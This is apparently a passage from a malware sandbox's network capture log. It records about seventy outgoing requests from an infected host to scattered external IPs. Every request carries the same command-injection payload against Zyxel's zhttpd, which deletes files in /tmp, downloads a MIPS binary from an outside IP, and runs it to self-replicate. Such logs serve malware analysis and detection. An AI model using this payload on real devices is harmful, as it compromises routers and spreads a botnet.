                        Mar 12, 2024 08:50:26.023277998 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        676192.168.2.144121817.132.35.217443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.023344040 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        677192.168.2.1456504223.75.199.164443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.023412943 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        678192.168.2.144918613.132.199.179443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.023461103 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        679192.168.2.1454452146.93.32.255443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.023518085 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        680192.168.2.14401109.242.104.225443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.023562908 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        681192.168.2.144869063.12.157.148443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.023622990 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        682192.168.2.144137068.1.182.70443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.023677111 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        683192.168.2.145481641.86.11.91443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.023744106 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        684192.168.2.1450224163.231.106.249443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.023787022 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        685192.168.2.14366782.63.183.209443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.023840904 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        686192.168.2.1450642132.206.136.173443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.023902893 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        687192.168.2.1434404117.54.93.13443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.023947001 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        688192.168.2.1454030191.252.250.110443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.024005890 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        689192.168.2.1453438201.114.30.215443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.024036884 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        690192.168.2.1434586125.19.6.184443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.024076939 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        691192.168.2.145109419.225.40.60443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.024132967 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        692192.168.2.1443362190.103.247.253443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.024224043 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        693192.168.2.145108653.215.18.69443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.024279118 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        694192.168.2.1434714184.49.205.211443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.024363995 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        695192.168.2.1435876114.160.95.229443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.024410963 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        696192.168.2.1444600118.6.68.223443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.024493933 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        697192.168.2.1443622153.172.49.229443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.024535894 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        698192.168.2.145135278.169.36.34443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.024589062 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        699192.168.2.1436576110.20.13.92443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.024646044 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        700192.168.2.143735647.31.136.121443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.024693966 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        701192.168.2.1455130101.46.245.117443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.024754047 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        702192.168.2.145986670.71.53.2443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.024791002 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        703192.168.2.1449982210.55.35.20443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.024866104 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        704192.168.2.1457768132.115.98.135443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.024950027 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        705192.168.2.1457096162.28.160.88443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.025026083 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        706192.168.2.1442834156.131.47.13443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.025067091 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        707192.168.2.1434376156.241.126.180443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.025130987 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        708192.168.2.1460494205.234.233.64443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.025156975 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        709192.168.2.1432894143.250.210.242443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.025211096 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        710192.168.2.1454072119.39.181.129443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.025258064 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        711192.168.2.1447712199.5.69.145443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.025321007 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        712192.168.2.143901218.230.54.190443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.025355101 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        713192.168.2.144388480.33.50.126443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.025433064 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        714192.168.2.1433290113.151.71.52443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.025490999 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        715192.168.2.146043670.23.199.70443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.025564909 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        716192.168.2.145816820.211.97.9443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.025614977 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        717192.168.2.145489868.26.233.44443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.025667906 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        718192.168.2.143648212.226.168.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.025719881 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        719192.168.2.1458576151.208.78.231443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.025772095 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        720192.168.2.144610851.42.223.136443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.025824070 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        721192.168.2.1454902124.13.148.20443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.025871038 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        722192.168.2.144590458.248.130.173443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.025918961 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        723192.168.2.1453728144.115.155.225443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.025995016 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        724192.168.2.1447220179.238.177.13443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.026041985 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        725192.168.2.143900863.53.178.133443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.026086092 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        726192.168.2.1445512219.210.33.33443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.026139021 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        727192.168.2.14399345.152.213.244443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.026202917 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        728192.168.2.1448028179.128.215.252443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.026268959 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        729192.168.2.143858635.109.48.150443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.026319027 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        730192.168.2.144018659.145.3.35443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.026396990 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        731192.168.2.1441380191.70.76.201443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.026454926 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        732192.168.2.1456446128.255.133.87443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.026499033 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        733192.168.2.1442302111.72.247.129443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.026573896 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        734192.168.2.1445828193.214.220.188443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.026639938 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        735192.168.2.1460202178.154.223.89443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.026684999 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        736192.168.2.145172662.215.93.45443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.026750088 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        737192.168.2.14570802.159.35.30443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.026791096 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        738192.168.2.1441424218.132.99.225443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.026875019 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        739192.168.2.1441008201.74.112.60443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.026949883 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        740192.168.2.1438400152.167.111.193443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.026992083 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        741192.168.2.1442326211.90.232.41443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.027050972 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        742192.168.2.1439976223.7.56.236443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.027122974 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        743192.168.2.1438830100.50.110.147443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.027199984 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        744192.168.2.145171691.150.100.235443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.027255058 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        745192.168.2.1458910136.236.255.106443
                        TimestampBytes transferredDirectionData
